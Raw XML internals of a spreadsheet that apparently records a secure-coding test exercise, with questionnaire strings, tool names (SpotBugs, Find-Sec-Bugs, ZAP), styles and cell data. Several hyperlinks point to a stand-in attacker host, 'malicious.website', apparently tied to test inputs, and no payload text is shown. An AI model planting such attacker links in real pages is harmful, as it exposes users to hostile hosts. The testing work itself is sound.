  <si>
    <t xml:space="preserve">the tested application seems to be developed adequately following secure coding rules </t>
  </si>
  <si>
    <t>the overall experience has been interesting</t>
  </si>
  <si>
    <t>Strongly Agree</t>
  </si>
  <si>
    <t xml:space="preserve">the overall experience has been useful </t>
  </si>
  <si>
    <t>I have the following comment</t>
  </si>
  <si>
    <t>…</t>
  </si>
  <si>
    <t>Answers</t>
  </si>
  <si>
    <t>App Tested</t>
  </si>
  <si>
    <t>Testing tool</t>
  </si>
  <si>
    <t>SpotBugs + Find-Sec-Bugs</t>
  </si>
  <si>
    <t xml:space="preserve">Zap web scanner </t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Other…</t>
  </si>
  <si>
    <t>NA</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</si>
</sst>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sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font/>
    <font>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF7F7F7F"/>
      <name val="Calibri"/>
    </font>
  </fonts>
  <fills count="7">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F2F2"/>
        <bgColor rgb="FFF2F2F2"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEEAF6"/>
        <bgColor rgb="FFDEEAF6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor rgb="FFFFC000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7"/>
        <bgColor theme="7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor theme="0"/>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top/>
      <bottom/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <top/>
      <bottom/>
    </border>
    <border>
      <top/>
      <bottom/>
    </border>
    <border>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1" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="4" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="2" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="5" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="2" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0"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wrapText="1"/>
    </xf>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2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="12" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="1" fillId="6" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="3" fontId="2"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xf borderId="2" fillId="3" fontId="2"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1" fillId="3" fontId="5"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8" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="13" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="15" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="16" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="13" fillId="2"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malicious.website/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious.website/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious.website/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious.website/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.jquery.com/jquery-1.12.4.js"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86"/>
    <col customWidth="1" min="3" max="3" width="27.14"/>
    <col customWidth="1" min="4" max="4" width="20.0"/>
    <col customWidth="1" min="5" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" customHeight="1"/>
    <row r="2" ht="14.25" customHeight="1"/>
    <row r="3" ht="14.25" customHeight="1"/>
    <row r="4" ht="14.25" customHeight="1"/>
    <row r="5" ht="14.25" customHeight="1"/>
    <row r="6" ht="14.25" customHeight="1">
      <c r="B6" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="7" ht="14.25" customHeight="1">
      <c r="B7" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="8" ht="14.25" customHeight="1">
      <c r="B8" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C8" s="2">
        <v>248724.0</v>
      </c>
    </row>
    <row r="9" ht="14.25" customHeight="1"/>
    <row r="10" ht="14.25" customHeight="1"/>
    <row r="11" ht="14.25" customHeight="1">
      <c r="B11" s="3" t="s">
        <v>5</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>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C11">
      <formula1>Fields!H2:H4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5.57"/>
    <col customWidth="1" min="3" max="3" width="18.71"/>
    <col customWidth="1" min="4" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" customHeight="1">
      <c r="A1" s="5"/>
      <c r="B1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="2" ht="14.25" customHeight="1"/>
    <row r="3" ht="14.25" customHeight="1">
      <c r="A3" s="6">
        <v>1.0</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="7" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" ht="14.25" customHeight="1">
      <c r="A4" s="6">
        <v>2.0</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>11</v>
      </c>
      <c r="C4" s="7" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="5" ht="14.25" customHeight="1">
      <c r="A5" s="6">
        <v>3.0</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="7" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6" ht="14.25" customHeight="1">
      <c r="A6" s="6">
        <v>4.0</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>14</v>
      </c>
      <c r="C6" s="7" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="7" ht="14.25" customHeight="1">
      <c r="A7" s="6">
        <v>5.0</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>15</v>
      </c>
      <c r="C7" s="7" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="8" ht="14.25" customHeight="1">
      <c r="A8" s="6">
        <v>6.0</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>16</v>
      </c>
      <c r="C8" s="7" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" ht="14.25" customHeight="1">
      <c r="A9" s="6">
        <v>7.0</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>18</v>
      </c>
      <c r="C9" s="7" t="s">
        <v>19</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C9">
      <formula1>Fields!$L$2:$L$3</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="C3:C8">
      <formula1>Fields!$E$2:$E$6</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26.0"/>
    <col customWidth="1" min="3" max="3" width="19.14"/>
    <col customWidth="1" min="4" max="4" width="22.43"/>
    <col customWidth="1" min="5" max="5" width="19.14"/>
    <col customWidth="1" min="6" max="6" width="30.43"/>
    <col customWidth="1" min="7" max="7" width="132.0"/>
    <col customWidth="1" min="8" max="8" width="86.86"/>
    <col customWidth="1" min="9" max="9" width="40.0"/>
    <col customWidth="1" min="10" max="10" width="26.14"/>
    <col customWidth="1" min="11" max="11" width="35.57"/>
    <col customWidth="1" min="12" max="12" width="51.86"/>
    <col customWidth="1" min="13" max="13" width="62.43"/>
    <col customWidth="1" min="14" max="14" width="32.29"/>
    <col customWidth="1" min="15" max="15" width="42.57"/>
    <col customWidth="1" min="16" max="16" width="87.14"/>
    <col customWidth="1" min="17" max="17" width="79.14"/>
    <col customWidth="1" min="18" max="18" width="100.0"/>
    <col customWidth="1" min="19" max="19" width="80.29"/>
    <col customWidth="1" min="20" max="20" width="8.71"/>
    <col customWidth="1" min="21" max="21" width="36.43"/>
    <col customWidth="1" min="22" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" customHeight="1">
      <c r="A1" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" ht="14.25" customHeight="1"/>
    <row r="3" ht="14.25" customHeight="1"/>
    <row r="4" ht="14.25" customHeight="1">
      <c r="C4" s="9" t="s">
        <v>21</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>22</v>
      </c>
      <c r="E4" s="10" t="s">
        <v>23</v>
      </c>
      <c r="F4" s="9" t="s">
        <v>24</v>
      </c>
      <c r="G4" s="9" t="s">
        <v>25</v>
      </c>
      <c r="H4" s="9" t="s">
        <v>26</v>
      </c>
      <c r="I4" s="9" t="s">
        <v>27</v>
      </c>
      <c r="J4" s="9" t="s">
        <v>28</v>
      </c>
      <c r="K4" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L4" s="9" t="s">
        <v>30</v>
      </c>
      <c r="M4" s="9" t="s">
        <v>31</v>
      </c>
      <c r="N4" s="9" t="s">
        <v>32</v>
      </c>
      <c r="O4" s="11" t="s">
        <v>33</v>
      </c>
      <c r="P4" s="12"/>
      <c r="Q4" s="13"/>
      <c r="R4" s="9" t="s">
        <v>34</v>
      </c>
      <c r="S4" s="9" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5" ht="14.25" customHeight="1">
      <c r="C5" s="14"/>
      <c r="D5" s="14"/>
      <c r="E5" s="14"/>
      <c r="F5" s="14"/>
      <c r="G5" s="14"/>
      <c r="H5" s="14"/>
      <c r="I5" s="14"/>
      <c r="J5" s="14"/>
      <c r="K5" s="14"/>
      <c r="L5" s="14"/>
      <c r="M5" s="14"/>
      <c r="N5" s="14"/>
      <c r="O5" s="15"/>
      <c r="P5" s="16"/>
      <c r="Q5" s="17"/>
      <c r="R5" s="14"/>
      <c r="S5" s="14"/>
    </row>
    <row r="6" ht="28.5" customHeight="1">
      <c r="C6" s="18"/>
      <c r="D6" s="18"/>
      <c r="E6" s="18"/>
      <c r="F6" s="18"/>
      <c r="G6" s="18"/>
      <c r="H6" s="18"/>
      <c r="I6" s="18"/>
      <c r="J6" s="18"/>
      <c r="K6" s="18"/>
      <c r="L6" s="18"/>
      <c r="M6" s="18"/>
      <c r="N6" s="18"/>
      <c r="O6" s="19" t="s">
        <v>36</v>
      </c>
      <c r="P6" s="19" t="s">
        <v>37</v>
      </c>
      <c r="Q6" s="20" t="s">
        <v>38</v>
      </c>
      <c r="R6" s="18"/>
      <c r="S6" s="18"/>
    </row>
    <row r="7" ht="129.0" customHeight="1">
      <c r="C7" s="21">
        <v>1.0</v>
      </c>
      <c r="D7" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E7" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F7" s="22" t="s">
        <v>41</v>
      </c>
      <c r="G7" s="22" t="s">
        <v>42</v>
      </c>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L7" s="22" t="s">
        <v>44</v>
      </c>
      <c r="M7" s="22">
        <v>15.0</v>
      </c>
      <c r="N7" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O7" s="23"/>
      <c r="P7" s="23"/>
      <c r="Q7" s="23"/>
      <c r="R7" s="22" t="s">
        <v>45</v>
      </c>
      <c r="S7" s="24" t="s">
        <v>46</v>
      </c>
      <c r="U7" s="25"/>
    </row>
    <row r="8" ht="129.0" customHeight="1">
      <c r="C8" s="21">
        <v>2.0</v>
      </c>
      <c r="D8" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E8" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F8" s="22" t="s">
        <v>41</v>
      </c>
      <c r="G8" s="22" t="s">
        <v>42</v>
      </c>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L8" s="22" t="s">
        <v>44</v>
      </c>
      <c r="M8" s="22">
        <v>5.0</v>
      </c>
      <c r="N8" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O8" s="23"/>
      <c r="P8" s="23"/>
      <c r="Q8" s="23"/>
      <c r="R8" s="22" t="s">
        <v>47</v>
      </c>
      <c r="S8" s="18"/>
      <c r="U8" s="25"/>
    </row>
    <row r="9" ht="129.0" customHeight="1">
      <c r="C9" s="21">
        <v>3.0</v>
      </c>
      <c r="D9" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E9" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F9" s="22" t="s">
        <v>41</v>
      </c>
      <c r="G9" s="22" t="s">
        <v>48</v>
      </c>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L9" s="22" t="s">
        <v>44</v>
      </c>
      <c r="M9" s="22">
        <v>20.0</v>
      </c>
      <c r="N9" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O9" s="23"/>
      <c r="P9" s="23"/>
      <c r="Q9" s="23"/>
      <c r="R9" s="22" t="s">
        <v>49</v>
      </c>
      <c r="S9" s="22" t="s">
        <v>50</v>
      </c>
      <c r="U9" s="26"/>
    </row>
    <row r="10" ht="129.0" customHeight="1">
      <c r="C10" s="21">
        <v>4.0</v>
      </c>
      <c r="D10" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E10" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F10" s="22" t="s">
        <v>41</v>
      </c>
      <c r="G10" s="22" t="s">
        <v>48</v>
      </c>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L10" s="22" t="s">
        <v>44</v>
      </c>
      <c r="M10" s="22">
        <v>5.0</v>
      </c>
      <c r="N10" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
      <c r="Q10" s="23"/>
      <c r="R10" s="22" t="s">
        <v>51</v>
      </c>
      <c r="S10" s="22" t="s">
        <v>52</v>
      </c>
      <c r="U10" s="26"/>
    </row>
    <row r="11" ht="129.0" customHeight="1">
      <c r="C11" s="21">
        <v>5.0</v>
      </c>
      <c r="D11" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E11" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F11" s="22" t="s">
        <v>53</v>
      </c>
      <c r="G11" s="22" t="s">
        <v>54</v>
      </c>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L11" s="22" t="s">
        <v>56</v>
      </c>
      <c r="M11" s="22">
        <v>5.0</v>
      </c>
      <c r="N11" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O11" s="23"/>
      <c r="P11" s="23"/>
      <c r="Q11" s="23"/>
      <c r="R11" s="22" t="s">
        <v>57</v>
      </c>
      <c r="S11" s="24" t="s">
        <v>58</v>
      </c>
      <c r="U11" s="26"/>
    </row>
    <row r="12" ht="129.0" customHeight="1">
      <c r="C12" s="21">
        <v>6.0</v>
      </c>
      <c r="D12" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E12" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F12" s="22" t="s">
        <v>53</v>
      </c>
      <c r="G12" s="22" t="s">
        <v>59</v>
      </c>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L12" s="22" t="s">
        <v>56</v>
      </c>
      <c r="M12" s="22">
        <v>20.0</v>
      </c>
      <c r="N12" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
      <c r="Q12" s="23"/>
      <c r="R12" s="22" t="s">
        <v>60</v>
      </c>
      <c r="S12" s="18"/>
      <c r="U12" s="25"/>
    </row>
    <row r="13" ht="129.0" customHeight="1">
      <c r="C13" s="21">
        <v>7.0</v>
      </c>
      <c r="D13" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E13" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F13" s="22" t="s">
        <v>53</v>
      </c>
      <c r="G13" s="22" t="s">
        <v>54</v>
      </c>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L13" s="22" t="s">
        <v>56</v>
      </c>
      <c r="M13" s="22">
        <v>5.0</v>
      </c>
      <c r="N13" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O13" s="23"/>
      <c r="P13" s="23"/>
      <c r="Q13" s="23"/>
      <c r="R13" s="22" t="s">
        <v>61</v>
      </c>
      <c r="S13" s="22" t="s">
        <v>62</v>
      </c>
      <c r="U13" s="26"/>
    </row>
    <row r="14" ht="200.25" customHeight="1">
      <c r="C14" s="21">
        <v>8.0</v>
      </c>
      <c r="D14" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E14" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F14" s="22" t="s">
        <v>53</v>
      </c>
      <c r="G14" s="22" t="s">
        <v>54</v>
      </c>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="23"/>
      <c r="K14" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L14" s="22" t="s">
        <v>56</v>
      </c>
      <c r="M14" s="22">
        <v>30.0</v>
      </c>
      <c r="N14" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O14" s="22" t="s">
        <v>63</v>
      </c>
      <c r="P14" s="22" t="s">
        <v>64</v>
      </c>
      <c r="Q14" s="22" t="s">
        <v>65</v>
      </c>
      <c r="R14" s="22" t="s">
        <v>66</v>
      </c>
      <c r="S14" s="22" t="s">
        <v>67</v>
      </c>
      <c r="U14" s="26"/>
    </row>
    <row r="15" ht="370.5" customHeight="1">
      <c r="C15" s="21"/>
      <c r="D15" s="22" t="s">
        <v>68</v>
      </c>
      <c r="E15" s="22" t="s">
        <v>69</v>
      </c>
      <c r="F15" s="22" t="s">
        <v>53</v>
      </c>
      <c r="G15" s="22"/>
      <c r="H15" s="23"/>
      <c r="I15" s="22" t="s">
        <v>70</v>
      </c>
      <c r="J15" s="23"/>
      <c r="K15" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L15" s="22" t="s">
        <v>56</v>
      </c>
      <c r="M15" s="22">
        <v>5.0</v>
      </c>
      <c r="N15" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O15" s="22" t="s">
        <v>63</v>
      </c>
      <c r="P15" s="22" t="s">
        <v>64</v>
      </c>
      <c r="Q15" s="22" t="s">
        <v>65</v>
      </c>
      <c r="R15" s="22"/>
      <c r="S15" s="22" t="s">
        <v>71</v>
      </c>
      <c r="U15" s="26"/>
    </row>
    <row r="16" ht="370.5" customHeight="1">
      <c r="C16" s="21">
        <v>9.0</v>
      </c>
      <c r="D16" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E16" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F16" s="22" t="s">
        <v>72</v>
      </c>
      <c r="G16" s="22" t="s">
        <v>73</v>
      </c>
      <c r="H16" s="23"/>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L16" s="22" t="s">
        <v>74</v>
      </c>
      <c r="M16" s="22">
        <v>5.0</v>
      </c>
      <c r="N16" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O16" s="23"/>
      <c r="P16" s="23"/>
      <c r="Q16" s="23"/>
      <c r="R16" s="22" t="s">
        <v>75</v>
      </c>
      <c r="S16" s="22" t="s">
        <v>76</v>
      </c>
      <c r="U16" s="26"/>
    </row>
    <row r="17" ht="363.0" customHeight="1">
      <c r="C17" s="21">
        <v>10.0</v>
      </c>
      <c r="D17" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E17" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F17" s="22" t="s">
        <v>77</v>
      </c>
      <c r="G17" s="22" t="s">
        <v>78</v>
      </c>
      <c r="H17" s="23"/>
      <c r="I17" s="23"/>
      <c r="J17" s="23"/>
      <c r="K17" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L17" s="22" t="s">
        <v>79</v>
      </c>
      <c r="M17" s="22">
        <v>40.0</v>
      </c>
      <c r="N17" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O17" s="22" t="s">
        <v>80</v>
      </c>
      <c r="P17" s="27" t="s">
        <v>81</v>
      </c>
      <c r="Q17" s="22" t="s">
        <v>82</v>
      </c>
      <c r="R17" s="22" t="s">
        <v>83</v>
      </c>
      <c r="S17" s="22" t="s">
        <v>84</v>
      </c>
      <c r="U17" s="25"/>
    </row>
    <row r="18" ht="299.25" customHeight="1">
      <c r="C18" s="21">
        <v>11.0</v>
      </c>
      <c r="D18" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E18" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F18" s="22" t="s">
        <v>77</v>
      </c>
      <c r="G18" s="22" t="s">
        <v>78</v>
      </c>
      <c r="H18" s="23"/>
      <c r="I18" s="23"/>
      <c r="J18" s="23"/>
      <c r="K18" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L18" s="22" t="s">
        <v>79</v>
      </c>
      <c r="M18" s="22">
        <v>40.0</v>
      </c>
      <c r="N18" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O18" s="22" t="s">
        <v>85</v>
      </c>
      <c r="P18" s="27" t="s">
        <v>86</v>
      </c>
      <c r="Q18" s="22" t="s">
        <v>87</v>
      </c>
      <c r="R18" s="22" t="s">
        <v>88</v>
      </c>
      <c r="S18" s="22" t="s">
        <v>89</v>
      </c>
      <c r="U18" s="25"/>
    </row>
    <row r="19" ht="371.25" customHeight="1">
      <c r="C19" s="21">
        <v>12.0</v>
      </c>
      <c r="D19" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E19" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F19" s="22" t="s">
        <v>77</v>
      </c>
      <c r="G19" s="22" t="s">
        <v>90</v>
      </c>
      <c r="H19" s="23"/>
      <c r="I19" s="23"/>
      <c r="J19" s="23"/>
      <c r="K19" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L19" s="22" t="s">
        <v>79</v>
      </c>
      <c r="M19" s="22">
        <v>40.0</v>
      </c>
      <c r="N19" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O19" s="22" t="s">
        <v>91</v>
      </c>
      <c r="P19" s="27" t="s">
        <v>92</v>
      </c>
      <c r="Q19" s="22" t="s">
        <v>93</v>
      </c>
      <c r="R19" s="22" t="s">
        <v>94</v>
      </c>
      <c r="S19" s="22" t="s">
        <v>95</v>
      </c>
      <c r="U19" s="25"/>
    </row>
    <row r="20" ht="320.25" customHeight="1">
      <c r="C20" s="21">
        <v>13.0</v>
      </c>
      <c r="D20" s="22" t="s">
        <v>39</v>
      </c>
      <c r="E20" s="22" t="s">
        <v>40</v>
      </c>
      <c r="F20" s="22" t="s">
        <v>77</v>
      </c>
      <c r="G20" s="22" t="s">
        <v>90</v>
      </c>
      <c r="H20" s="23"/>
      <c r="I20" s="23"/>
      <c r="J20" s="23"/>
      <c r="K20" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L20" s="22" t="s">
        <v>79</v>
      </c>
      <c r="M20" s="22">
        <v>5.0</v>
      </c>
      <c r="N20" s="22" t="s">
        <v>43</v>
      </c>
      <c r="O20" s="23"/>
      <c r="P20" s="23"/>
      <c r="Q20" s="23"/>
      <c r="R20" s="22" t="s">
        <v>96</v>
      </c>
      <c r="S20" s="22" t="s">
        <v>97</v>
      </c>
      <c r="U20" s="26"/>
    </row>
    <row r="21" ht="259.5" customHeight="1">
      <c r="C21" s="21">
        <v>14.0</v>
      </c>
      <c r="D21" s="22" t="s">
        <v>98</v>
      </c>
      <c r="E21" s="23"/>
      <c r="F21" s="22" t="s">
        <v>77</v>
      </c>
      <c r="G21" s="23"/>
      <c r="H21" s="23"/>
      <c r="I21" s="23"/>
      <c r="J21" s="23"/>
      <c r="K21" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L21" s="22" t="s">
        <v>79</v>
      </c>
      <c r="M21" s="22">
        <v>10.0</v>
      </c>
      <c r="N21" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O21" s="22" t="s">
        <v>70</v>
      </c>
      <c r="P21" s="27" t="s">
        <v>99</v>
      </c>
      <c r="Q21" s="22" t="s">
        <v>100</v>
      </c>
      <c r="R21" s="22" t="s">
        <v>101</v>
      </c>
      <c r="S21" s="22" t="s">
        <v>102</v>
      </c>
      <c r="U21" s="26"/>
    </row>
    <row r="22" ht="427.5" customHeight="1">
      <c r="C22" s="21">
        <v>15.0</v>
      </c>
      <c r="D22" s="22" t="s">
        <v>98</v>
      </c>
      <c r="E22" s="23"/>
      <c r="F22" s="22" t="s">
        <v>103</v>
      </c>
      <c r="G22" s="23"/>
      <c r="H22" s="23"/>
      <c r="I22" s="23"/>
      <c r="J22" s="23"/>
      <c r="K22" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L22" s="22" t="s">
        <v>104</v>
      </c>
      <c r="M22" s="22">
        <v>15.0</v>
      </c>
      <c r="N22" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O22" s="22" t="s">
        <v>105</v>
      </c>
      <c r="P22" s="22" t="s">
        <v>106</v>
      </c>
      <c r="Q22" s="22" t="s">
        <v>107</v>
      </c>
      <c r="R22" s="22" t="s">
        <v>108</v>
      </c>
      <c r="S22" s="22" t="s">
        <v>109</v>
      </c>
      <c r="U22" s="26"/>
    </row>
    <row r="23" ht="304.5" customHeight="1">
      <c r="C23" s="21">
        <v>16.0</v>
      </c>
      <c r="D23" s="22" t="s">
        <v>68</v>
      </c>
      <c r="E23" s="22" t="s">
        <v>110</v>
      </c>
      <c r="F23" s="22" t="s">
        <v>111</v>
      </c>
      <c r="G23" s="22" t="s">
        <v>112</v>
      </c>
      <c r="H23" s="28" t="s">
        <v>113</v>
      </c>
      <c r="I23" s="23"/>
      <c r="J23" s="23"/>
      <c r="K23" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L23" s="22" t="s">
        <v>114</v>
      </c>
      <c r="M23" s="22">
        <v>10.0</v>
      </c>
      <c r="N23" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O23" s="22"/>
      <c r="P23" s="29" t="s">
        <v>115</v>
      </c>
      <c r="Q23" s="22" t="s">
        <v>116</v>
      </c>
      <c r="R23" s="23"/>
      <c r="S23" s="22" t="s">
        <v>117</v>
      </c>
      <c r="U23" s="25"/>
    </row>
    <row r="24" ht="209.25" customHeight="1">
      <c r="C24" s="21">
        <v>17.0</v>
      </c>
      <c r="D24" s="22" t="s">
        <v>68</v>
      </c>
      <c r="E24" s="22" t="s">
        <v>110</v>
      </c>
      <c r="F24" s="22" t="s">
        <v>118</v>
      </c>
      <c r="G24" s="22" t="s">
        <v>119</v>
      </c>
      <c r="H24" s="22" t="s">
        <v>120</v>
      </c>
      <c r="I24" s="23"/>
      <c r="J24" s="23"/>
      <c r="K24" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L24" s="22" t="s">
        <v>121</v>
      </c>
      <c r="M24" s="22">
        <v>10.0</v>
      </c>
      <c r="N24" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O24" s="22"/>
      <c r="P24" s="29" t="s">
        <v>122</v>
